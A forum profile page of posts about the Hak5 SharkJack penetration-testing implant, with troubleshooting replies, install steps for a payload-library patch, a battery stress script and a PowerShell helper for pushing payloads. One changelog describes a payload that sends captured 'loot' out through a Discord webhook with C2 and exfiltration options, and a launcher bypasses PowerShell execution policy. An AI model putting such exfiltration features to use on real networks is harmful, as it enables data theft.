Everything posted by REDD

  1. Very interesting, I can insert both straight into the Ethernet Port or via USB Adapter and get responses from both.. I just reinstalled the firmware on the spare SharkJack I have and no issues. I think this issue is due to your setup.
  2. Should be able to "Connect to SSH" and "Connect to WebUI" if your SharkJack is updated.
  3. And the WebUI is the IP of the SharkJack (1.1.0+ Firmware) in your browser once the device is in Arming Mode and detected by the machine. Aka. http://172.16.24.1/
  4. Use the PowerShell Script and tell me if it even detects it in Arming Mode and what options don't work (besides SharkLib options - it's obsolete since the patch). https://forums.hak5.org/topic/51075-tool-sharkjackps1-powershell-version-of-sharkjacksh/
  5. We are gonna need a little more information about:
      - How you have it connected to the machine?
      - Are you able to connect to the WebUI at all when in Arming mode while connected?
      - Have you factory reset the device and still have the same issues?
  6. I think you are misunderstanding what the SharkJack is.. It's a tiny OpenWRT box with a 5-15 min battery.. It only has about 27MB of free space to store Payloads on so you're pretty limited to the extent of the device. There's a bunch of tools, Payloads and opinions on the forums and GitHubs.
  7. @wulf I added a terminal version to the patch. Let me know what you think.. Download version 1.11 of the patch, "Remove Patch", then "Install Patch" again.. It will give you a library command via SSH. Enjoy!
  8. "Enhanced Version" will be released in 24-48 hours. - I like the idea. And thanks!
  9. Thanks! I try to just make the device as easy as I can for everyone.. 😁
  10. If you try to add this with the Web UI, it won't work.. You'll have to follow the "Workaround" for adding this Payload into the Payload Library.. It contains characters the "Payload" tab doesn't like.. Lol
  11. Feb 3rd, 2021: Version 1.11
      - Minor fixes to patcher-win.cmd file. Fixes errors with some Windows users having errors with script seeing local files.

      Feb 3rd, 2021: Version 1.1
      - Adds Shell "library" command to the patch. (Formerly SharkLib)
      - Adds fixes to library command to make compatible with Patch WebUI Library.

      Jan 29th, 2021: Version 1.0d
      - Public Release of Patch.
  12. Payload Library for Web UI/SSH (Unofficial Patch)

      This (unofficial) Patch provides the Official SharkJack Web UI with an additional Tab on the Web UI (http://172.16.24.1/) to maintain your payloads on the Device itself rather than relying on a PC to switch to your prior used payloads.

      I personally figured since the SharkJack has not received any Love in over a year, I'd give it a little attention. Since it was missing a Payload Management System on the device (That is accessible via Web UI), I decided to make one. I attempted to "copy" the original style of the original Web UI. - Taking the POST methods and programming style of the previous developer to try to bring features without "adding" dependencies to the SharkJack. I have also included a Patcher for both Windows Machines and Unix/Mac's (Utilizing the current sharkjack.sh tool from Hak5 - Kudos Devs) to make this feature available to everyone. Enjoy!

      Features:
        • Backup your current Payload to the Library.
        • Download any Payload in the Library.
        • Restore any Payload in the Library.
        • Delete any Payload in the Library.
        • Adds "library" command to SharkJack. - Allows ALL the same features as the WebUI Library Tab and is CROSS-COMPATIBLE!

      Example Screenshot of the Library via WebUI:

      Screenshot of Library ("library" command) via SSH:

      What is needed to Install:
        • Sharkjack with 1.1.0 firmware or higher installed.
        • Ethernet Port on Local Machine to connect the SharkJack.
        • Administrator/Root user on Local Machine.

      How to Install:
        1. Head to https://github.com/InfoSecREDD/sj-webui-patch/releases
        2. Download the most current release (.zip or .tar.gz).
        3. Unzip the downloaded file to a location of your choice.
        4. Connect your SharkJack in ARMING MODE to the Ethernet Port on your local machine.
        5. Run the appropriate Patcher for your OS. (Windows: patcher-win.cmd, Linux/Mac: patcher-linux.sh)
        6. Select "1" on the menu and follow the Patcher's Instructions.
        7. Once Patcher is finished, Head to the SharkJack Web UI to verify it has been installed. (http://172.16.24.1/)
        8. Enjoy!

      How to Remove: (If already downloaded & unzipped. Skip to Step #4)
        1. Head to https://github.com/InfoSecREDD/sj-webui-patch/releases
        2. Download the most current release (.zip or .tar.gz).
        3. Unzip the downloaded file to a location of your choice.
        4. Connect your SharkJack in ARMING MODE to the Ethernet Port on your local machine.
        5. Run the appropriate Patcher for your OS. (Windows: patcher-win.cmd, Linux/Mac: patcher-linux.sh)
        6. Select "2" on the menu and follow the Patcher's Instructions.
        7. Once Patcher is finished, Head to the SharkJack Web UI to verify it has been removed. (http://172.16.24.1/)

      (Your Payloads will remain saved on the device under /root/library/ - We don't want to delete your payloads without your confirmation.)

      How to use the Web UI Library:
        1. Connect the SharkJack in ARMING MODE to the Ethernet Port on your Local Machine.
        2. Open up your Browser of choice (Chrome, Firefox, Brave, Opera, Edge (🤮), etc) and go to "http://172.16.24.1/".
        3. Navigate to the "Library" tab on the Top Menu.
        4. Input your desired Payload Name in the Backup input field box and click the "BACKUP" button.
        5. Click "Ok" on the Window Alert.
        6. The Page will instantly refresh. (At this point you can choose to "Restore", "Download", and "Delete" that payload.)
        7. Enjoy!

      How to use the Terminal Extension:
        1. Connect the SharkJack in ARMING MODE to the Ethernet Port on your Local Machine.
        2. Open up your SSH Client of choice (PuTTY, Linux Terminal, PowerShell/CMD (if OpenSSH Client (Beta) Feature is installed on Windows 10)) and connect to 172.16.24.1 with your credentials.
        3. Type "library" and hit [Enter] in the shell and follow the prompted Menu.
        4. Enjoy!

      Known Issues:
        • Payload Tab - Payload text that includes certain special characters do not translate in POST Method. (SharkJack 1.1.0 - 1.0.1 WebUI Issue.) This issue has nothing to do with this patcher or project. (See workaround below)
        • Payload Tab - Payload text that exceeds certain character limit stalls and does not post payload content to correct location. (SharkJack 1.1.0 - 1.0.1 WebUI Issue.) This issue has nothing to do with this patcher or project. (See workaround below)

      Workaround for Payload Tab Issues:
        • Connect to SharkJack via SSH and use SCP to transfer payloads to "/root/payload/payload.sh". It will appear in the "Payload Tab" and you'll be able to backup/restore the payload using the Library Tab.
        • If using a SFTP Client, make sure your Text Editor is formatted for "UNIX Style Formatting" otherwise you will end up with "^M", etc, after each line. - Then transfer the appropriate Payload to "/root/payload/payload.sh". It will appear in the "Payload Tab" and you'll be able to backup/restore the payload using the Library Tab.

      Source GitHub Repo: https://github.com/InfoSecREDD/sj-webui-patch
      Patch.sh Source: https://github.com/InfoSecREDD/sj-webui-patch/blob/main/patch.sh
      Payload Library Source: https://github.com/InfoSecREDD/sj-webui-patch/blob/main/patch/library.sh
      Patcher-Win Source: https://github.com/InfoSecREDD/sj-webui-patch/blob/main/patcher-win.cmd
      Patcher-Linux Source: https://github.com/InfoSecREDD/sj-webui-patch/blob/main/patcher-linux.sh
      Payload Library Shell Extension: https://github.com/InfoSecREDD/sj-webui-patch/blob/main/patch/library
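
The line-ending workaround from the post above, as an added shell example that is not part of the original post or the sj-webui-patch project: it detects the "^M" (carriage return) line endings, writes an LF-only copy, and confirms line 1 is a clean shebang before the file is transferred. The function names and the sample payload file are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): make sure a payload has UNIX (LF)
# line endings before it is copied to /root/payload/payload.sh on the device.

# has_cr FILE: exit 0 if FILE contains at least one carriage-return byte.
has_cr() {
    # Strip CRs and compare with the original; any difference means CRs exist.
    if tr -d '\r' < "$1" | cmp -s - "$1"; then
        return 1
    fi
    return 0
}

# count_cr_lines FILE: print how many lines end in CR (the "^M" an editor shows).
count_cr_lines() {
    cr=$(printf '\r')
    # grep -c exits 1 when the count is 0, so do not treat that as a failure.
    grep -c "${cr}\$" "$1" || true
}

# normalize_payload SRC DST: write an LF-only copy of SRC to DST.
# Returns 0 on success, 2 if SRC is missing, 3 if line 1 is not a shebang.
normalize_payload() {
    src=$1
    dst=$2
    [ -f "$src" ] || { echo "missing: $src" >&2; return 2; }
    # tr removes every CR byte in the file, not only those at line ends.
    tr -d '\r' < "$src" > "$dst"
    # With CRLF endings the interpreter name becomes "bash\r" and the script
    # fails to start, so confirm the first line is now a clean shebang.
    first=$(head -n 1 "$dst")
    case $first in
        '#!/'*) return 0 ;;
        *) echo "no shebang on line 1 of $src" >&2; return 3 ;;
    esac
}

# Constructed sample: a two-line payload saved with Windows (CRLF) line endings.
demo() {
    tmp=$(mktemp -d)
    printf '#!/bin/bash\r\nLED SETUP\r\n' > "$tmp/payload.win.sh"
    echo "CR-terminated lines before: $(count_cr_lines "$tmp/payload.win.sh")"
    normalize_payload "$tmp/payload.win.sh" "$tmp/payload.sh"
    echo "CR-terminated lines after:  $(count_cr_lines "$tmp/payload.sh")"
    rm -rf "$tmp"
}
demo

# Then transfer the normalized file as the post describes:
#   scp payload.sh root@172.16.24.1:/root/payload/payload.sh
```
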
  13. Most likely Windows based if they're using a VBOX Kali VM, I would help but I've never passed an Ethernet port thru. But should be the same options for VirtualBox software cross platforms.
  14. When I use it on a VM or VBox setup, I use a USB to Ethernet Adapter and pass the USB through to the VM. Good Luck.
  15. Version 1.3 (Jan 23rd 2021):
      - Added Discord Webhook Integration to the Payload as an alternate source of acquiring loot from the SharkJack.
      - Added Optional "send as file" or "send as plain text messages" to the payload.

      Version 1.2 (Jan 22nd 2021):
      - Fixed Errors with C2CONNECT and EXFIL not working correctly as intended in script.
      - Added forced wait until nmap finished to look for loot.
      - Cleaned up script process.
  16. This happens when the payload isn't set correctly or is the wrong firmware version for the Payload.
  17. Yeah, you can change it whatever you feel like. This was a more of a proof of concept to use ARP to find the correct subnet.
  18. @Darren Kitchen Currently mine only gets like 2 mins "Under Load".. Not sure if that's good thing..

          Battery Test Date: Tue Jan 28 13:48:57 UTC 2020
          ==================================================
          Battery Test running for 20 minutes and 0 seconds.
          Battery Status: full
          -> LOAD created by sha256sum.
          ==================================================
          [01:48:57 PM] -> LOAD: YES - CPU Load: 18.0481% [Battery Status: full]
          [01:48:57 PM] -> LOAD: YES - CPU Load: 18.0588% [Battery Status: full]
          [01:48:59 PM] -> LOAD: YES - CPU Load: 18.1068% [Battery Status: full]
          [01:49:00 PM] -> LOAD: YES - CPU Load: 18.1528% [Battery Status: discharging]
          [01:49:01 PM] -> LOAD: YES - CPU Load: 18.1969% [Battery Status: discharging]
          [01:49:02 PM] -> LOAD: YES - CPU Load: 18.2414% [Battery Status: discharging]
          [01:49:03 PM] -> LOAD: YES - CPU Load: 18.2865% [Battery Status: discharging]
          [01:49:05 PM] -> LOAD: YES - CPU Load: 18.3312% [Battery Status: discharging]
          [01:49:06 PM] -> LOAD: YES - CPU Load: 18.3785% [Battery Status: discharging]
          [01:49:07 PM] -> LOAD: YES - CPU Load: 18.4227% [Battery Status: discharging]
          [01:49:08 PM] -> LOAD: YES - CPU Load: 18.4666% [Battery Status: discharging]
          [01:49:09 PM] -> LOAD: YES - CPU Load: 18.5114% [Battery Status: discharging]
          [01:49:11 PM] -> LOAD: YES - CPU Load: 18.5555% [Battery Status: discharging]
          [01:49:12 PM] -> LOAD: YES - CPU Load: 18.6026% [Battery Status: discharging]
          [01:49:13 PM] -> LOAD: YES - CPU Load: 18.6469% [Battery Status: discharging]
          [01:49:14 PM] -> LOAD: YES - CPU Load: 18.6905% [Battery Status: discharging]
          [01:49:15 PM] -> LOAD: YES - CPU Load: 18.734% [Battery Status: discharging]
          [01:49:17 PM] -> LOAD: YES - CPU Load: 18.7782% [Battery Status: discharging]
          [01:49:18 PM] -> LOAD: YES - CPU Load: 18.8258% [Battery Status: discharging]
          [01:49:19 PM] -> LOAD: YES - CPU Load: 18.8703% [Battery Status: discharging]
          [01:49:20 PM] -> LOAD: YES - CPU Load: 18.9136% [Battery Status: discharging]
          [01:49:21 PM] -> LOAD: YES - CPU Load: 18.9569% [Battery Status: discharging]
          [01:49:22 PM] -> LOAD: YES - CPU Load: 19.0009% [Battery Status: discharging]
          [01:49:24 PM] -> LOAD: YES - CPU Load: 19.0474% [Battery Status: discharging]
          [01:49:25 PM] -> LOAD: YES - CPU Load: 19.0917% [Battery Status: discharging]
          [01:49:26 PM] -> LOAD: YES - CPU Load: 19.1344% [Battery Status: discharging]
          [01:49:27 PM] -> LOAD: YES - CPU Load: 19.1778% [Battery Status: discharging]
          [01:49:28 PM] -> LOAD: YES - CPU Load: 19.2215% [Battery Status: discharging]
          [01:49:30 PM] -> LOAD: YES - CPU Load: 19.2674% [Battery Status: discharging]
          [01:49:31 PM] -> LOAD: YES - CPU Load: 19.3126% [Battery Status: discharging]
          [01:49:32 PM] -> LOAD: YES - CPU Load: 19.3558% [Battery Status: discharging]
          [01:49:33 PM] -> LOAD: YES - CPU Load: 19.399% [Battery Status: discharging]
          [01:49:34 PM] -> LOAD: YES - CPU Load: 19.4421% [Battery Status: discharging]
          [01:49:36 PM] -> LOAD: YES - CPU Load: 19.4889% [Battery Status: discharging]
          [01:49:37 PM] -> LOAD: YES - CPU Load: 19.5334% [Battery Status: discharging]
          [01:49:38 PM] -> LOAD: YES - CPU Load: 19.5764% [Battery Status: discharging]
          [01:49:39 PM] -> LOAD: YES - CPU Load: 19.6208% [Battery Status: discharging]
          [01:49:40 PM] -> LOAD: YES - CPU Load: 19.6644% [Battery Status: discharging]
          [01:49:42 PM] -> LOAD: YES - CPU Load: 19.7087% [Battery Status: discharging]
          [01:49:43 PM] -> LOAD: YES - CPU Load: 19.7544% [Battery Status: discharging]
          [01:49:44 PM] -> LOAD: YES - CPU Load: 19.7972% [Battery Status: discharging]
          [01:49:45 PM] -> LOAD: YES - CPU Load: 19.8395% [Battery Status: discharging]
          [01:49:46 PM] -> LOAD: YES - CPU Load: 19.8826% [Battery Status: discharging]
          [01:49:48 PM] -> LOAD: YES - CPU Load: 19.9259% [Battery Status: discharging]
          [01:49:49 PM] -> LOAD: YES - CPU Load: 19.9717% [Battery Status: discharging]
          [01:49:50 PM] -> LOAD: YES - CPU Load: 20.015% [Battery Status: discharging]
          [01:49:51 PM] -> LOAD: YES - CPU Load: 20.0571% [Battery Status: discharging]
          [01:49:52 PM] -> LOAD: YES - CPU Load: 20.0995% [Battery Status: discharging]
          [01:49:54 PM] -> LOAD: YES - CPU Load: 20.1419% [Battery Status: discharging]
          [01:49:55 PM] -> LOAD: YES - CPU Load: 20.1879% [Battery Status: discharging]
          [01:49:56 PM] -> LOAD: YES - CPU Load: 20.2309% [Battery Status: discharging]
          [01:49:57 PM] -> LOAD: YES - CPU Load: 20.2728% [Battery Status: discharging]
          [01:49:58 PM] -> LOAD: YES - CPU Load: 20.315% [Battery Status: discharging]
          [01:50:00 PM] -> LOAD: YES - CPU Load: 20.3575% [Battery Status: discharging]
          [01:50:01 PM] -> LOAD: YES - CPU Load: 20.4021% [Battery Status: discharging]
          [01:50:02 PM] -> LOAD: YES - CPU Load: 20.4453% [Battery Status: discharging]
          [01:50:03 PM] -> LOAD: YES - CPU Load: 20.4869% [Battery Status: discharging]
          [01:50:04 PM] -> LOAD: YES - CPU Load: 20.5289% [Battery Status: discharging]
          [01:50:06 PM] -> LOAD: YES - CPU Load: 20.5712% [Battery Status: discharging]
          [01:50:07 PM] -> LOAD: YES - CPU Load: 20.6152% [Battery Status: discharging]
          [01:50:08 PM] -> LOAD: YES - CPU Load: 20.6585% [Battery Status: discharging]
          [01:50:09 PM] -> LOAD: YES - CPU Load: 20.6996% [Battery Status: discharging]
          [01:50:10 PM] -> LOAD: YES - CPU Load: 20.7406% [Battery Status: discharging]
          --- END OF FILE ---
  19. Battery Tester/CPU Stress For the SharkJack

      I keep seeing people talk about how the battery lasts less than 10 minutes, etc etc etc.. I made a script to test and prove the Battery Drains incredibly fast under load. Furthermore... The Script.. (NOTE: This Script should be run on the SharkJack itself!)

      battery-tester.sh

          #!/bin/bash
          # Title         : Battery Tester/CPU Stress
          # Author        : REDD of Private-Locker
          # Version       : 1.1
          # Description   : The script uses a simple log system to pull the
          #                 batteries status, date, and time into a log file for Hak5
          #                 to help diagnose the issues. Also uses "sha256sum" to verify
          #                 a null file leaving it to stress the CPU.
          #
          # Log File      : /root/battery.log

          # Set to YES to stress the CPU during Battery Test.
          MAX_LOAD=YES
          STRESS="sha256sum"

          # Time in seconds to report in log. (20 mins = 1200)
          TIME=600

          # Initial Script Variables - DO NOT CHANGE
          UNDER_LOAD=0
          DATE_NOW=$(date +'%r')
          START_TIME=$(date)
          CPU_USAGE=$(grep 'cpu ' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage "%"}')
          BATTERY_STATUS=$(BATTERY)
          LOG_FILE="/root/battery.log"

          function DISPLAY_TIME () {
              MINS=$((TIME / 60))
              SECS=$((TIME % 60))
              if [ "$TIME" -ge "60" ]; then
                  printf "$MINS minutes and $SECS seconds"
              else
                  printf "$SECS seconds"
              fi
          }
          TOTAL_TIME=$(DISPLAY_TIME "$TIME")
          if [ ! -f "$LOG_FILE" ]; then
              touch "$LOG_FILE"
          fi
          if [ -f "$LOG_FILE" ]; then
              echo -e "" >> "$LOG_FILE"
              echo -e " Battery Test Date: $START_TIME" >> "$LOG_FILE"
              echo -e "==================================================" >> "$LOG_FILE"
              echo -e "" >> "$LOG_FILE"
              echo -e ""
              echo -e " Battery Test Date: $START_TIME"
              echo -e "\n Battery Test running for $TOTAL_TIME."
              echo -e " Battery Test running for $TOTAL_TIME." >> "$LOG_FILE"
              echo -e " Battery Status: $BATTERY_STATUS"
              echo -e " Battery Status: $BATTERY_STATUS" >> "$LOG_FILE"
              echo -e ""
              if [ "$MAX_LOAD" == "YES" ]; then
                  echo -e "\n\n -> LOAD created by $STRESS."
                  echo -e " -> LOAD created by $STRESS." >> "$LOG_FILE"
                  echo -e "" >> "$LOG_FILE"
                  echo -e "==================================================" >> "$LOG_FILE"
                  echo -e "" >> "$LOG_FILE"
              fi
              echo -e "" >> "$LOG_FILE"
          fi
          echo -e "[${DATE_NOW}] -> LOAD: $MAX_LOAD - CPU Load: ${CPU_USAGE} [Battery Status: ${BATTERY_STATUS}]" >> "$LOG_FILE"
          for ((i=0; i<=TIME; i++)); do
              if [ "$MAX_LOAD" == "YES" ]; then
                  if [ "$UNDER_LOAD" == "0" ]; then
                      UNDER_LOAD=1
                      $STRESS /dev/zero &
                  fi
              fi
              DATE_NOW=$(date +'%r')
              CPU_USAGE=$(grep 'cpu ' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage "%"}')
              BATTERY_STATUS=$(BATTERY)
              printf "[%s%s] -> LOAD: %s - CPU Load: %s [Battery Status: %s]\r" $DATE_NOW $MAX_LOAD $CPU_USAGE $BATTERY_STATUS
              echo -e "[${DATE_NOW}] -> LOAD: $MAX_LOAD - CPU Load: ${CPU_USAGE} [Battery Status: ${BATTERY_STATUS}]" >> "$LOG_FILE"
              sleep 1;
          done
          if [ "$UNDER_LOAD" == "1" ]; then
              killall -9 $STRESS
          fi
          echo -e "" >> "$LOG_FILE"
          echo -e "==================================================" >> "$LOG_FILE"
          echo -e "" >> "$LOG_FILE"
          # Blank line for running in Terminal.
          printf " \n"
          printf "Finished.\n"

      Output Example:

          Battery Test Date: Tue Jan 28 13:47:30 UTC 2020
          ==================================================
          Battery Test running for 10 seconds.
          Battery Status: full
          [01:47:30 PM] -> LOAD: NO - CPU Load: 18.0325% [Battery Status: full]
          [01:47:30 PM] -> LOAD: NO - CPU Load: 18.0437% [Battery Status: full]
          [01:47:31 PM] -> LOAD: NO - CPU Load: 18.0428% [Battery Status: full]
          [01:47:32 PM] -> LOAD: NO - CPU Load: 18.0432% [Battery Status: full]
          [01:47:33 PM] -> LOAD: NO - CPU Load: 18.0469% [Battery Status: full]
          [01:47:34 PM] -> LOAD: NO - CPU Load: 18.0515% [Battery Status: full]
          [01:47:35 PM] -> LOAD: NO - CPU Load: 18.0556% [Battery Status: full]
          [01:47:37 PM] -> LOAD: NO - CPU Load: 18.0596% [Battery Status: full]
          [01:47:38 PM] -> LOAD: NO - CPU Load: 18.0641% [Battery Status: full]
          [01:47:39 PM] -> LOAD: NO - CPU Load: 18.0678% [Battery Status: full]
          [01:47:40 PM] -> LOAD: NO - CPU Load: 18.0718% [Battery Status: full]
          [01:47:41 PM] -> LOAD: NO - CPU Load: 18.0759% [Battery Status: full]
          ==================================================

      I really hope this helps everyone else in their troubles in finding out if their Battery is just defective or it's just "Under Load" that makes it so short.
  20. Launching the *.ps1 File:
      - Open up Notepad or any Text Editor of your choice.
      - Copy and Paste the following code in the Text Editor.

          @echo off
          cls
          PowerShell.exe -ExecutionPolicy Bypass -File %~dp0sharkjack.ps1
          exit /b

      - Go to "File", then click "Save As..".
      - Save the file as "launcher.cmd", and Save the File in the same Directory(folder) as the sharkjack.ps1 file.
      - Close the Text Editor and double-click on "launcher.cmd" file you have just created.

      Enjoy
  21. Sharkjack.ps1

      This is a rewritten (Windows) PowerShell version of Hak5's "sharkjack.sh". Compliments to Hak5 for the Device and the original script. I only take credit for rewriting the script to support Windows.

      Please Note: SharkLib Options are DISABLED until Hak5 merges SharkLib into the GitHub.

      If you are having problems getting the file to run, see Post #3.

      (If you have multiple SharkJacks, type "clearssh" in menu to clear your "known hosts" SSH File of the SharkJack's Fingerprint. Then try to reconnect using SSH via option #5)

      sharkjack.ps1

          # Title: SharkJack Helper Script (PowerShell)
          # Author: Hak5 (rewritten for Windows by REDD)
          # Version: 1.2

          # Remove for Debugging purposes.
          $ErrorActionPreference = "SilentlyContinue"

          # Base Script Variables - DO NOT CHANGE
          Write-Host "Initializing... One Moment Please..."
          $console = $host.ui.rawui
          $console.backgroundcolor = "Black"
          $console.foregroundcolor = "Green"
          $colors = $host.privatedata
          $colors.verbosebackgroundcolor = "Yellow"
          $colors.verboseforegroundcolor = "Black"
          $colors.warningbackgroundcolor = "Red"
          $colors.warningforegroundcolor = "white"
          $colors.ErrorBackgroundColor = "DarkCyan"
          $colors.ErrorForegroundColor = "Yellow"
          $DIR = Convert-Path .

          # Script Variables
          $SHARKJACK_IP = "172.16.24.1"
          $REMOTE_PAYLOAD = "root@$SHARKJACK_IP`:/root/payload/payload.sh"
          $UPGRADE_FILE = 'https://downloads.hak5.org/api/devices/sharkjack/firmwares/1.1.0'
          $BASEFILENAME = "upgrade-1.1.0.bin"
          $FIRMWARE_SHA = "03638c7937a1718b6535116eac8b0a75f2a79054e61dc401af56b51da2044386"
          $PAYLOADDIR = $DIR+'\library'
          $MENU_SELECTION = 0
          $CIRCLE = ([char]8226)

          Function Header_Ascii {
              Write-Host ""
              Write-Host " ########################################################"
              Write-Host ""
              Write-Host ""
              Write-Host " \_____)\_____ Shark Jack _____/(_____/"
              Write-Host " /--v____ __$CIRCLE< by Hak5 >$($CIRCLE)__ ____v--\"
              Write-Host " )/ \("
              Write-Host ""
              Write-Host ""
              Write-Host " ########################################################"
              Write-Host " Windows Version by REDD"
              Write-Host ""
          }

          # Wait until the SharkJack answers a ping (device in Arming Mode).
          Function Initialize {
              $CONN_SUCC = 0
              $LOOP = 0
              while ($CONN_SUCC -eq 0) {
                  $connection = Test-Connection "$SHARKJACK_IP" -Count 1 -Quiet
                  If ($connection -eq $true) {
                      Write-Host "SharkJack detected.."
                      Start-Sleep -s 2
                      $CONN_SUCC = 1;
                  } ElseIf ($connection -eq $false) {
                      If ($LOOP -eq 0) {
                          Write-Host -NoNewline "Please Connect the SharkJack in Arming Mode.."
                          Start-Sleep -s 2
                          $LOOP = 1;
                      } Else {
                          Write-Host -NoNewline "."
                          Start-Sleep -s 2
                      }
                  }
              }
          }

          Function Download_Repo {
              Write-Host "Checking if Connection to Internet is possible with SharkJack connected."
              Write-Host ""
              Write-Host "Please Wait.."
              Write-Host ""
              $HTTP_Request = [System.Net.WebRequest]::Create('http://google.com')
              $HTTP_Response = $HTTP_Request.GetResponse()
              $HTTP_Status = [int]$HTTP_Response.StatusCode
              If ($HTTP_Status -eq 200) {
                  Write-Host " -> Connection established!"
                  $Connection_Check = 1
              } Else {
                  Write-Host " -> Connection Failed!"
                  $Connection_Check = 0
              }
              If ($HTTP_Response -eq $null) { } Else { $HTTP_Response.Close() }
              Write-Host ""
              if ( $Connection_Check -eq 1 ) {
                  if (!(Test-Path $PAYLOADDIR)) {
                      Write-Host "Downloading Payload Library from GitHub.. Please Wait."
                      $WebClient = New-Object System.Net.WebClient
                      $WebClient.DownloadFile("https://github.com/hak5/sharkjack-payloads/archive/master.zip","$DIR\master.zip")
                      Write-Host "Extracting Payload Library.."
                      Expand-Archive -LiteralPath $DIR\master.zip -DestinationPath $DIR
                      Get-ChildItem -Path "$DIR\sharkjack-payloads-master" | Copy-Item -Force -Destination "$DIR" -Recurse -Container
                      Get-ChildItem -Path "$DIR\sharkjack-payloads-master\payloads" | Copy-Item -Force -Destination "$DIR" -Recurse -Container
                      Remove-Item $DIR\sharkjack-payloads-master -Force -Recurse -ErrorAction SilentlyContinue
                      Remove-Item $DIR\payloads -Force -Recurse -ErrorAction SilentlyContinue
                      Write-Host "Cleaning up Repo Files.."
                      Remove-Item -path $DIR\master.zip -force
                      Remove-Item -path $DIR\README.md -force
                      Remove-Item -path $DIR\sharkjack.sh -force
                      Write-Host "Finished."
                      Start-Sleep -s 2
                  } Else {
                      Write-Host "Payload Directory is already present in current Folder."
                      Start-Sleep -s 2
                  }
              } Else {
                  Write-Host " Disconnect the SharkJack from the PC OR Set your Internet to"
                  Write-Host " the correct configurations, and try again."
                  Start-Sleep -s 15
              }
          }

          Function Copy_Payload {
              if (!(Test-Path $PAYLOADDIR)) {
                  Write-Host "No Payload Library downloaded. Starting Downloading Process."
                  Start-Sleep -s 2
                  Download_Repo
              }
              Initialize
              $MAINFOLDERS = @(Get-ChildItem $PAYLOADDIR | Select Name | Sort @{Expression={$_.name.length}} -Descending | Out-GridView -Title 'Choose a Directory' -PassThru | Select -ExpandProperty "Name")
              if (!($MAINFOLDERS)) { Write-Host "ERROR: Please Select a Folder."; Start-Sleep -s 2; Menu-Function }
              $PAYLOADSELECTDIR = @(Get-ChildItem $PAYLOADDIR\$MAINFOLDERS | Select Name | Sort @{Expression={$_.name.length}} -Descending | Out-GridView -Title 'Choose a Payload' -PassThru | Select -ExpandProperty "Name")
              if (!($PAYLOADSELECTDIR)) { Write-Host "ERROR: Please Select a Payload."; Start-Sleep -s 2; Menu-Function }
              $SELECTED_PAYLOAD = $PAYLOADDIR+'\'+$MAINFOLDERS+'\'+$PAYLOADSELECTDIR+'\payload.sh'
              Write-Host "Copying ->"
              Write-Host "Source Payload: $SELECTED_PAYLOAD"
              Write-Host "Destin Payload: $DIR\payload.sh"
              Write-Host "Remote Payload: $REMOTE_PAYLOAD"
              Write-Host ""
              Copy-Item "$SELECTED_PAYLOAD" -Destination "$DIR\payload.sh"
              Write-Host "Attempting to Push Payload to SharkJack.."
              scp "$DIR\payload.sh" "$REMOTE_PAYLOAD"
              Write-Host "Finished."
              Start-Sleep -s 2
              Menu-Function
          }

          Function Copy_Dir_Payload {
              $Current_Payload = $DIR+'\payload.sh'
              if (!(Test-Path "$Current_Payload" -PathType Leaf)) {
                  Write-Host "No $Current_Payload exists."
                  Start-Sleep -s 7
              } Else {
                  Initialize
                  Write-Host "Attempting to Push Payload to SharkJack.."
                  scp "$DIR\payload.sh" "$REMOTE_PAYLOAD"
                  Write-Host "Finished."
                  Start-Sleep -s 2
                  Menu-Function
              }
          }

          Function Connect_SharkJack {
              Initialize
              Write-Host "Attempting to Connect (SSH) to the SharkJack.."
              ssh "root`@$SHARKJACK_IP"
              Write-Host "Done."
              Start-Sleep -s 2
              Menu-Function
          }

          # Rewrite known_hosts without the SharkJack's entry, keeping a .bk backup.
          Function Clean_Known_Hosts {
              Write-Host "Clearing old SSH Keys for SharkJack. Please Wait.."
              Get-Content $env:userprofile\.ssh\known_hosts | select-string -pattern "$SHARKJACK_IP" -notmatch | Out-File $env:userprofile\.ssh\known_hosts.new
              Copy-Item "$env:userprofile\.ssh\known_hosts" -Destination "$env:userprofile\.ssh\known_hosts.bk"
              Remove-Item -path $env:userprofile\.ssh\known_hosts -force
              Copy-Item "$env:userprofile\.ssh\known_hosts.new" -Destination "$env:userprofile\.ssh\known_hosts"
              Remove-Item -path $env:userprofile\.ssh\known_hosts.new -force
              Write-Host "Removed old SSH Keys for SharkJack. Try to connect again via SSH."
              Start-Sleep -s 3
              Menu-Function
          }

          Function Connect_SharkJack_Web {
              Initialize
              Write-Host "Attempting to Launch Browser to connect to SharkJack.."
              start "http://$SHARKJACK_IP/cgi-bin/status.sh"
              Menu-Function
          }

          Function Update_SharkJack {
              Write-Host "Checking if Connection to Internet is possible with SharkJack connected."
              Write-Host ""
              Write-Host "Please Wait.."
              Write-Host ""
              $HTTP_Request = [System.Net.WebRequest]::Create('http://google.com')
              $HTTP_Response = $HTTP_Request.GetResponse()
              $HTTP_Status = [int]$HTTP_Response.StatusCode
              If ($HTTP_Status -eq 200) {
                  Write-Host " -> Connection established!"
                  $Connection_Check = 1
              } Else {
                  Write-Host " -> Connection Failed!"
                  $Connection_Check = 0
              }
              If ($HTTP_Response -eq $null) { } Else { $HTTP_Response.Close() }
              If ( $Connection_Check -eq 1 ) {
                  $FIRMWARE_FILE = $DIR+'\'+$BASEFILENAME
                  Write-Host "Downloading Firmware from $UPGRADE_FILE"
                  $WebClient = New-Object System.Net.WebClient
                  $WebClient.DownloadFile("$UPGRADE_FILE","$FIRMWARE_FILE")
                  # Verify the download against the pinned SHA256 before flashing.
                  Write-Host "Checking SHA256 of $FIRMWARE_FILE"
                  $CHK_DOWNLOAD = (Get-FileHash -Path $FIRMWARE_FILE -Algorithm "SHA256" -ErrorAction Stop).Hash
                  If ($CHK_DOWNLOAD -ne $FIRMWARE_SHA) {
                      Write-Host "SHA256 DOES NOT MATCH! Deleting $BASEFILENAME"
                      del "$FIRMWARE_FILE"
                      Write-Host "Done. Please Retry again."
                      Start-Sleep -s 5
                      Menu-Function
                  } Else {
                      Write-Host "SHA256 Matches! Continuing Upgrade.."
                      Write-Host ""
                      Write-Host "Attempting to start the Upgrade Process.."
                      Write-Host "------------------------------------------------------"
                      Write-Host "PLEASE ONLY DO THIS IF YOU KNOW WHAT VERSION YOUR"
                      Write-Host "SHARKJACK IS ON."
                      Write-Host ""
                      $Confirm_Update = Read-Host "THIS WILL ERASE EVERYTHING ON THE SHARKJACK! ARE YOU SURE? (y/[N])"
                      Switch ($Confirm_Update) {
                          Y {Write-host "Confirmed!"; $Update_Confirm_Status = 1}
